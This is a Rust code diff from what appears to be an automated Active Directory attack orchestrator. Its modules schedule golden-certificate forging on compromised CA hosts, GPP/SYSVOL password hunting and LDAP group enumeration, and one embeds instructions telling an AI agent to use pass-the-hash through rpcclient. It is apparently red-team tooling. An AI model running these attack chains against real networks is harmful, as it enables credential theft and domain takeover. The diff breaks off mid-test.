+fn lookup_ca_name(state: &StateInner, host_ip: &str, hostname: &str) -> Option<String> { + let host_l = host_ip.to_lowercase(); + let hn_l = hostname.to_lowercase(); + state + .discovered_vulnerabilities + .values() + .filter(|v| { + let t = v.target.to_lowercase(); + t == host_l || t == hn_l + }) + .find_map(|v| { + for key in &["ca_name", "CA", "ca"] { + if let Some(s) = v.details.get(*key).and_then(|x| x.as_str()) { + if !s.is_empty() { + return Some(s.to_string()); + } + } + } + None + }) +} + +struct GoldenCertWork { + ca_host: String, + ca_hostname: String, + dedup_key: String, + domain: String, + dc_ip: Option<String>, + domain_sid: Option<String>, + ca_name: Option<String>, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use ares_core::models::{Credential, Host, Share}; + + fn make_credential(username: &str, password: &str, domain: &str) -> Credential { + Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_host(ip: &str, hostname: &str, owned: bool) -> Host { + Host { + ip: ip.into(), + hostname: hostname.into(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc: false, + owned, + } + } + + fn make_share(host: &str, name: &str) -> Share { + Share { + host: host.into(), + name: name.into(), + permissions: String::new(), + comment: String::new(), + } + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_GOLDEN_CERT, "golden_cert"); + } + + #[test] + fn extract_domain_typical() { + assert_eq!( + extract_domain_from_fqdn("ca01.contoso.local"), + Some("contoso.local".to_string()) + ); + } + + #[test] + fn extract_domain_case_insensitive() { + assert_eq!( + extract_domain_from_fqdn("CA01.CONTOSO.LOCAL"), + Some("contoso.local".to_string()) + ); + } + + #[test] + fn extract_domain_bare_hostname() 
{ + assert_eq!(extract_domain_from_fqdn("ca01"), None); + } + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_golden_cert_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_unowned_ca_host_skipped() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", false)); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_golden_cert_work(&state); + assert!(work.is_empty(), "unowned CA host should not yield work"); + } + + #[test] + fn collect_owned_non_ca_host_skipped() { + let mut state = StateInner::new("test-op".into()); + // Owned host but no CertEnroll share + state + .hosts + .push(make_host("192.168.58.20", "fs01.contoso.local", true)); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_golden_cert_work(&state); + assert!(work.is_empty(), "non-CA owned host should not yield work"); + } + + #[test] + fn collect_owned_ca_with_same_domain_cred_yields_work() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", true)); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_golden_cert_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].ca_host, "192.168.58.50"); + assert_eq!(work[0].ca_hostname, "ca01.contoso.local"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].credential.username, 
"admin"); + assert_eq!(work[0].dedup_key, "192.168.58.50:contoso.local"); + } + + #[test] + fn collect_dominated_domain_skipped() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", true)); + state.domains.push("contoso.local".into()); + state.dominated_domains.insert("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_golden_cert_work(&state); + assert!( + work.is_empty(), + "should not forge against an already-dominated domain" + ); + } + + #[test] + fn collect_dedup_skips_processed() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", true)); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_GOLDEN_CERT, "192.168.58.50:contoso.local".into()); + let work = collect_golden_cert_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credential_skipped() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", true)); + state.domains.push("contoso.local".into()); + // No credentials at all + let work = collect_golden_cert_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_resolves_dc_ip_when_available() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", true)); + state.domains.push("contoso.local".into()); + state + .credentials + 
.push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_golden_cert_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dc_ip.as_deref(), Some("192.168.58.10")); + } + + #[test] + fn collect_certenroll_case_insensitive() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "certenroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", true)); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_golden_cert_work(&state); + assert_eq!(work.len(), 1); + } + + #[test] + fn collect_picks_domain_sid_when_known() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", true)); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .domain_sids + .insert("contoso.local".into(), "S-1-5-21-1111-2222-3333".into()); + let work = collect_golden_cert_work(&state); + assert_eq!(work.len(), 1); + assert_eq!( + work[0].domain_sid.as_deref(), + Some("S-1-5-21-1111-2222-3333") + ); + } + + #[test] + fn collect_dedup_key_lowercased() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "CA01.CONTOSO.LOCAL", true)); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_golden_cert_work(&state); + assert_eq!(work.len(), 1); + // Dedup key 
uses lowercase IP (already lowercase here) and lowercase domain + assert_eq!(work[0].dedup_key, "192.168.58.50:contoso.local"); + } + + #[test] + fn collect_multiple_owned_cas_yields_multiple_work() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state.shares.push(make_share("192.168.58.51", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", true)); + state + .hosts + .push(make_host("192.168.58.51", "ca02.fabrikam.local", true)); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("fabadmin", "Fab!Pass", "fabrikam.local")); // pragma: allowlist secret + let work = collect_golden_cert_work(&state); + assert_eq!(work.len(), 2); + } +} diff --git a/ares-cli/src/orchestrator/automation/golden_ticket.rs b/ares-cli/src/orchestrator/automation/golden_ticket.rs index d58b7372..3127cb0c 100644 --- a/ares-cli/src/orchestrator/automation/golden_ticket.rs +++ b/ares-cli/src/orchestrator/automation/golden_ticket.rs @@ -229,7 +229,7 @@ pub async fn auto_golden_ticket(dispatcher: Arc, mut shutdown: watch /// Uses the credential's own domain for NTLM auth (not the target domain) so /// cross-domain trust authentication works — e.g. a `child.contoso.local` /// cred can resolve the SID of `contoso.local` via its parent DC. -async fn resolve_domain_sid( +pub(crate) async fn resolve_domain_sid( _domain: &str, dc_ip: &str, password_cred: Option<&ares_core::models::Credential>, diff --git a/ares-cli/src/orchestrator/automation/gpp_sysvol.rs b/ares-cli/src/orchestrator/automation/gpp_sysvol.rs new file mode 100644 index 00000000..a2d6d049 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/gpp_sysvol.rs @@ -0,0 +1,342 @@ +//! 
auto_gpp_sysvol -- search for GPP passwords and credential artifacts in SYSVOL. +//! +//! Group Policy Preferences (GPP) XML files can contain encrypted passwords +//! using a publicly known AES key (MS14-025). SYSVOL scripts (.bat, .ps1, .vbs) +//! often contain hardcoded credentials. +//! +//! Dispatches two techniques per DC: +//! 1. `gpp_password_finder` — searches SYSVOL for Groups.xml, Scheduledtasks.xml, etc. +//! 2. `sysvol_script_search` — greps SYSVOL scripts for passwords/credentials + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect GPP/SYSVOL work items from state (pure logic, no async). +fn collect_gpp_sysvol_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + let dedup_key = format!("gpp:{}", domain.to_lowercase()); + if state.is_processed(DEDUP_GPP_SYSVOL, &dedup_key) { + continue; + } + + let cred = match state + .credentials + .iter() + .find(|c| c.domain.to_lowercase() == domain.to_lowercase()) + .or_else(|| state.credentials.first()) + { + Some(c) => c.clone(), + None => continue, + }; + + items.push(GppSysvolWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred, + }); + } + + items +} + +/// Searches SYSVOL for GPP passwords and script credentials. +/// Interval: 45s. +pub async fn auto_gpp_sysvol(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! 
{ + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("gpp_sysvol") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_gpp_sysvol_work(&state) + }; + + for item in work { + let payload = json!({ + "techniques": ["gpp_password_finder", "sysvol_script_search"], + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("gpp_sysvol"); + match dispatcher + .throttled_submit("credential_access", "credential_access", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "GPP/SYSVOL credential search dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_GPP_SYSVOL, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_GPP_SYSVOL, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(domain = %item.domain, "GPP/SYSVOL task deferred"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch GPP/SYSVOL search"); + } + } + } + } +} + +struct GppSysvolWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key = format!("gpp:{}", "contoso.local"); + assert_eq!(key, "gpp:contoso.local"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_GPP_SYSVOL, "gpp_sysvol"); + } + + #[test] + fn payload_contains_both_techniques() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + 
is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = json!({ + "techniques": ["gpp_password_finder", "sysvol_script_search"], + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + let techniques = payload["techniques"].as_array().unwrap(); + assert_eq!(techniques.len(), 2); + assert_eq!(techniques[0], "gpp_password_finder"); + assert_eq!(techniques[1], "sysvol_script_search"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = GppSysvolWork { + dedup_key: "gpp:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.dedup_key, "gpp:contoso.local"); + } + + #[test] + fn dedup_key_normalizes_domain() { + let key = format!("gpp:{}", "CONTOSO.LOCAL".to_lowercase()); + assert_eq!(key, "gpp:contoso.local"); + } + + #[test] + fn two_tasks_per_domain() { + // The payload dispatches two techniques in a single submission per domain + let techniques = ["gpp_password_finder", "sysvol_script_search"]; + assert_eq!(techniques.len(), 2); + } + + // --- collect_gpp_sysvol_work tests --- + + use crate::orchestrator::state::StateInner; + + fn make_cred(username: &str, domain: &str) -> ares_core::models::Credential { + ares_core::models::Credential { + id: uuid::Uuid::new_v4().to_string(), + username: username.to_string(), + password: "P@ssw0rd!".to_string(), // pragma: allowlist secret + domain: domain.to_string(), + source: String::new(), + discovered_at: 
None, + is_admin: false, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn collect_empty_state_produces_no_work() { + let state = StateInner::new("test".into()); + let work = collect_gpp_sysvol_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_produces_no_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_gpp_sysvol_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dc_with_matching_cred_produces_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_gpp_sysvol_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].dedup_key, "gpp:contoso.local"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_skips_already_processed_dedup() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + state.mark_processed(DEDUP_GPP_SYSVOL, "gpp:contoso.local".into()); + let work = collect_gpp_sysvol_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_falls_back_to_first_credential() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_cred("fabuser", "fabrikam.local")); + let work = collect_gpp_sysvol_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fabuser"); + } + + #[test] + fn collect_multiple_domains_produces_multiple_work() { + let mut state = 
StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + state + .credentials + .push(make_cred("fabadmin", "fabrikam.local")); + let work = collect_gpp_sysvol_work(&state); + assert_eq!(work.len(), 2); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_cred("fabuser", "fabrikam.local")); + state + .credentials + .push(make_cred("conuser", "contoso.local")); + let work = collect_gpp_sysvol_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "conuser"); + } + + #[test] + fn collect_case_insensitive_domain_match() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_gpp_sysvol_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "gpp:contoso.local"); + } + + #[test] + fn dedup_keys_differ_per_domain() { + let key1 = format!("gpp:{}", "contoso.local"); + let key2 = format!("gpp:{}", "fabrikam.local"); + assert_ne!(key1, key2); + } +} diff --git a/ares-cli/src/orchestrator/automation/group_enumeration.rs b/ares-cli/src/orchestrator/automation/group_enumeration.rs new file mode 100644 index 00000000..43723890 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/group_enumeration.rs @@ -0,0 +1,615 @@ +//! auto_group_enumeration -- enumerate domain groups and memberships via LDAP. +//! +//! Dispatches per-domain LDAP group enumeration to discover security groups, +//! their members, and cross-domain memberships. This covers a large gap in +//! 
attack surface mapping — group membership determines ACL attack paths, +//! privilege escalation chains, and cross-domain lateral movement. +//! +//! The recon agent queries `(objectCategory=group)` and resolves membership +//! recursively, including Foreign Security Principals for cross-domain groups. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect group enumeration work items from current state. +/// +/// Pure logic extracted from `auto_group_enumeration` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_group_enum_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() && state.hashes.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + let all_dcs = state.all_domains_with_dcs(); + if all_dcs.is_empty() { + return Vec::new(); + } + debug!( + domains = ?all_dcs.iter().map(|(d,_)| d.as_str()).collect::>(), + trusted = ?state.trusted_domains.keys().collect::>(), + creds = state.credentials.len(), + hashes = state.hashes.len(), + "Group enum state check" + ); + for (domain, dc_ip) in &all_dcs { + // Use separate dedup keys for cred vs hash attempts so a failed + // password-based attempt (e.g., mislabeled credential domain) + // doesn't permanently block the hash-based path. + let dedup_key_cred = format!("group_enum:{}:cred", domain.to_lowercase()); + let dedup_key_hash = format!("group_enum:{}:hash", domain.to_lowercase()); + let dedup_key_trust = format!("group_enum:{}:trust", domain.to_lowercase()); + + // Prefer same-domain cleartext cred, then fall back to trust-compatible + // cred (child→parent or cross-forest). Trust-based attempts use a + // separate dedup key so they don't block hash-based fallback. 
+ let (cred, using_trust_cred) = + if !state.is_processed(DEDUP_GROUP_ENUMERATION, &dedup_key_cred) { + let c = state + .credentials + .iter() + .find(|c| c.domain.to_lowercase() == domain.to_lowercase()) + .cloned(); + (c, false) + } else { + (None, false) + }; + let (cred, using_trust_cred) = + if cred.is_none() && !state.is_processed(DEDUP_GROUP_ENUMERATION, &dedup_key_trust) { + match state.find_trust_credential(domain) { + Some(c) => (Some(c), true), + None => (None, using_trust_cred), + } + } else { + (cred, using_trust_cred) + }; + + // Look for NTLM hash (PTH) — fires independently of cred attempt + let (ntlm_hash, ntlm_hash_username) = + if cred.is_none() && !state.is_processed(DEDUP_GROUP_ENUMERATION, &dedup_key_hash) { + state + .hashes + .iter() + .find(|h| { + h.hash_type.to_lowercase() == "ntlm" + && h.domain.to_lowercase() == domain.to_lowercase() + && h.username.to_lowercase() == "administrator" + }) + .or_else(|| { + state.hashes.iter().find(|h| { + h.hash_type.to_lowercase() == "ntlm" + && h.domain.to_lowercase() == domain.to_lowercase() + && !state.is_delegation_account(&h.username) + }) + }) + .map(|h| (Some(h.hash_value.clone()), Some(h.username.clone()))) + .unwrap_or((None, None)) + } else { + (None, None) + }; + + // Need at least a credential or an NTLM hash + if cred.is_none() && ntlm_hash.is_none() { + debug!( + domain = %domain, + cred_dedup = state.is_processed(DEDUP_GROUP_ENUMERATION, &dedup_key_cred), + trust_dedup = state.is_processed(DEDUP_GROUP_ENUMERATION, &dedup_key_trust), + hash_dedup = state.is_processed(DEDUP_GROUP_ENUMERATION, &dedup_key_hash), + "Group enum: no credential/hash found for domain" + ); + continue; + } + + let dedup_key = if ntlm_hash.is_some() { + dedup_key_hash + } else if using_trust_cred { + dedup_key_trust + } else { + dedup_key_cred + }; + + items.push(GroupEnumWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred.unwrap_or_else(|| ares_core::models::Credential { + id: 
String::new(), + username: ntlm_hash_username.clone().unwrap_or_default(), + password: String::new(), + domain: domain.clone(), + source: "hash_fallback".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }), + ntlm_hash, + ntlm_hash_username, + }); + } + + items +} + +/// Dispatches group enumeration per domain. +/// Interval: 45s. +pub async fn auto_group_enumeration( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(20)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("group_enumeration") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_group_enum_work(&state) + }; + + if !work.is_empty() { + info!( + count = work.len(), + domains = ?work.iter().map(|w| w.domain.as_str()).collect::>(), + "Group enumeration work items collected" + ); + } + for item in work { + // When PTH hash is available, use the hash user's identity for the target domain + // instead of a cross-domain credential that will fail LDAP simple bind. 
+ let (cred_user, cred_pass, cred_domain) = if item.ntlm_hash.is_some() { + ( + item.ntlm_hash_username + .clone() + .unwrap_or_else(|| item.credential.username.clone()), + String::new(), // empty password forces PTH path + item.domain.clone(), // target domain, not cross-domain + ) + } else { + ( + item.credential.username.clone(), + item.credential.password.clone(), + item.credential.domain.clone(), + ) + }; + let cross_domain = cred_domain.to_lowercase() != item.domain.to_lowercase(); + let mut payload = json!({ + "technique": "ldap_group_enumeration", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": cred_user, + "password": cred_pass, + "domain": cred_domain, + }, + "filters": ["(objectCategory=group)"], + "attributes": [ + "sAMAccountName", "member", "memberOf", "managedBy", + "groupType", "objectSid", "description", "cn" + ], + "enumerate_members": true, + "resolve_foreign_principals": true, + "instructions": concat!( + "Enumerate ALL security groups in this domain.\n\n", + "AUTHENTICATION: If the password field is EMPTY and an NTLM hash is provided, ", + "you MUST use pass-the-hash. Do NOT attempt LDAP simple bind with empty password.\n", + " Use rpcclient_command with the hash parameter: rpcclient_command(target=dc_ip, ", + "username=user, domain=domain, hash=, command='enumdomgroups') — ", + "then for each group RID: 'querygroupmem ' and 'queryuser ' to resolve members.\n", + " IMPORTANT: Pass the hash via the 'hash' parameter, NOT as the password.\n\n", + "If a password IS provided, use ldap_search with filter (objectCategory=group) ", + "to enumerate groups, members, and Foreign Security Principals.\n\n", + "CROSS-DOMAIN AUTH: If the credential domain differs from the target domain ", + "(e.g. credential from child.domain.local querying parent domain.local), ", + "you MUST pass bind_domain= to ldap_search. 
", + "Check the 'bind_domain' field in the task payload — if present, always pass it ", + "to ldap_search so the LDAP bind uses user@bind_domain while querying the target domain.\n\n", + "For EACH group found, report it as a vulnerability:\n", + " vuln_type: 'group_enumerated'\n", + " target: the group sAMAccountName\n", + " target_ip: the DC IP\n", + " domain: the domain\n", + " details: {\"group_type\": \"Global/DomainLocal/Universal\", ", + "\"members\": [\"user1\", \"user2\"], \"managed_by\": \"manager\", ", + "\"admin_count\": true/false}\n\n", + "Pay special attention to: Domain Admins, Enterprise Admins, Administrators, ", + "Backup Operators, Server Operators, Account Operators, DnsAdmins, ", + "and any custom groups with adminCount=1.\n\n", + "Report cross-domain memberships as vuln_type='foreign_group_membership'.\n\n", + "IMPORTANT: For each user found, include in discovered_users array:\n", + " {\"username\": \"samaccountname\", \"domain\": \"domain.local\", ", + "\"source\": \"ldap_group_enumeration\", \"memberOf\": [\"Group1\", \"Group2\"]}" + ), + }); + if cross_domain { + payload["bind_domain"] = json!(item.credential.domain); + } + // Attach NTLM hash for PTH when no cleartext cred for target domain + if let Some(ref hash) = item.ntlm_hash { + payload["ntlm_hash"] = json!(hash); + } + if let Some(ref user) = item.ntlm_hash_username { + payload["hash_username"] = json!(user); + } + + let priority = dispatcher.effective_priority("group_enumeration"); + match dispatcher + .force_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "Group enumeration dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_GROUP_ENUMERATION, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_GROUP_ENUMERATION, &item.dedup_key) + .await; + } + Ok(None) => { + info!(domain = %item.domain, dc = 
%item.dc_ip, "Group enumeration deferred by throttler"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch group enumeration"); + } + } + } + } +} + +struct GroupEnumWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, + ntlm_hash: Option, + ntlm_hash_username: Option, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key_cred = format!("group_enum:{}:cred", "contoso.local"); + let key_hash = format!("group_enum:{}:hash", "contoso.local"); + assert_eq!(key_cred, "group_enum:contoso.local:cred"); + assert_eq!(key_hash, "group_enum:contoso.local:hash"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_GROUP_ENUMERATION, "group_enumeration"); + } + + #[test] + fn payload_structure_has_correct_technique() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = json!({ + "technique": "ldap_group_enumeration", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + "filters": ["(objectCategory=group)"], + "attributes": [ + "sAMAccountName", "member", "memberOf", "managedBy", + "groupType", "objectSid", "description", "cn" + ], + "enumerate_members": true, + "resolve_foreign_principals": true, + }); + assert_eq!(payload["technique"], "ldap_group_enumeration"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert!(payload["enumerate_members"].as_bool().unwrap()); + assert!(payload["resolve_foreign_principals"].as_bool().unwrap()); + } + + #[test] + fn ldap_attributes_list() { + let attrs = [ + "sAMAccountName", + "member", + "memberOf", + "managedBy", + "groupType", + 
"objectSid", + "description", + "cn", + ]; + assert_eq!(attrs.len(), 8); + assert!(attrs.contains(&"sAMAccountName")); + assert!(attrs.contains(&"objectSid")); + assert!(attrs.contains(&"managedBy")); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = GroupEnumWork { + dedup_key: "group_enum:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + ntlm_hash: None, + ntlm_hash_username: None, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.credential.username, "admin"); + } + + #[test] + fn dedup_key_normalizes_domain() { + let key = format!("group_enum:{}", "CONTOSO.LOCAL".to_lowercase()); + assert_eq!(key, "group_enum:contoso.local"); + } + + #[test] + fn dedup_keys_differ_per_domain() { + let key1 = format!("group_enum:{}:cred", "contoso.local"); + let key2 = format!("group_enum:{}:cred", "fabrikam.local"); + assert_ne!(key1, key2); + } + + #[test] + fn collect_hash_fires_after_cred_dedup_burned() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Cred-based attempt already dispatched (may have failed) + state.mark_processed( + DEDUP_GROUP_ENUMERATION, + "group_enum:contoso.local:cred".into(), + ); + // Add an NTLM hash — should still generate work via hash path + state.hashes.push(ares_core::models::Hash { + id: "h1".into(), + username: "Administrator".into(), + hash_value: "aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0".into(), + hash_type: "ntlm".into(), + domain: "contoso.local".into(), + source: "secretsdump".into(), + 
